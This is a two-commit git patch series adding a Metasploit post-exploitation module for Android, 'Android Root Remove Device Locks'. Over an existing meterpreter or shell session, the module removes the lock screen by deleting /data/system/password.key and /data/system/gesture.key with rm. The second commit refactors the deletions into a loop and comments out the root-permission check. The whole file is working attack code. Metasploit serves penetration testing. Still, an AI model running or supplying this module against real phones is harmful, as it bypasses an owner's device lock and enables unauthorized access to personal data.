From 5035db77b840a2aa4806c693cb0bf0a94b66b77c Mon Sep 17 00:00:00 2001
From: Tim <timrlw@gmail.com>
Date: Mon, 25 May 2015 13:37:30 +0100
Subject: [PATCH 1/2] add remove lockscreen for android

---
 .../post/android/manage/remove_lock_root.rb   | 41 +++++++++++++++++++
 1 file changed, 41 insertions(+)
 create mode 100644 modules/post/android/manage/remove_lock_root.rb

diff --git a/modules/post/android/manage/remove_lock_root.rb b/modules/post/android/manage/remove_lock_root.rb
new file mode 100644
index 0000000000..8cff239fea
--- /dev/null
+++ b/modules/post/android/manage/remove_lock_root.rb
@@ -0,0 +1,41 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Post
+
+  include Msf::Post::Common
+
+  def initialize(info={})
+    super( update_info( info, {
+        'Name'          => "Android Root Remove Device Locks",
+        'Description'   => %q{
+            This module uses root privileges to remove the device lock.
+            In some cases the original lock method will still be present but any key/gesture will
+            unlock the device.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'timwr' ],
+        'SessionTypes'  => [ 'meterpreter', 'shell' ],
+        'Platform'      => 'android',
+      }
+    ))
+  end
+
+  def run
+    id = cmd_exec('id')
+    unless id =~ /root/
+      print_error("This module requires root permissions")
+      return
+    end
+
+    cmd_exec('rm /data/system/password.key')
+    cmd_exec('rm /data/system/gesture.key')
+  end
+
+end
+

From 630057e23f474117e5cce16a0c0860678ce249a7 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Thu, 3 Sep 2015 12:42:51 -0500
Subject: [PATCH 2/2] Implement suggestions from the PR discussion

---
 modules/post/android/manage/remove_lock_root.rb | 16 ++++++++++++----
 1 file changed, 12 insertions(+), 4 deletions(-)

diff --git a/modules/post/android/manage/remove_lock_root.rb b/modules/post/android/manage/remove_lock_root.rb
index 8cff239fea..9498d0fbec 100644
--- a/modules/post/android/manage/remove_lock_root.rb
+++ b/modules/post/android/manage/remove_lock_root.rb
@@ -18,6 +18,7 @@ class Metasploit4 < Msf::Post
             In some cases the original lock method will still be present but any key/gesture will
             unlock the device.
         },
+        'Privileged'    => true,
         'License'       => MSF_LICENSE,
         'Author'        => [ 'timwr' ],
         'SessionTypes'  => [ 'meterpreter', 'shell' ],
@@ -29,12 +30,19 @@ class Metasploit4 < Msf::Post
   def run
     id = cmd_exec('id')
     unless id =~ /root/
-      print_error("This module requires root permissions")
-      return
+      #print_error("This module requires root permissions")
+      #return
     end
 
-    cmd_exec('rm /data/system/password.key')
-    cmd_exec('rm /data/system/gesture.key')
+    %W{
+      /data/system/password.key
+      /data/system/gesture.key
+    }.each do |path|
+      print_status("Removing #{path}")
+      cmd_exec("rm #{path}")
+    end
+
+    print_status("Device should be unlocked or no longer require a pin")
   end
 
 end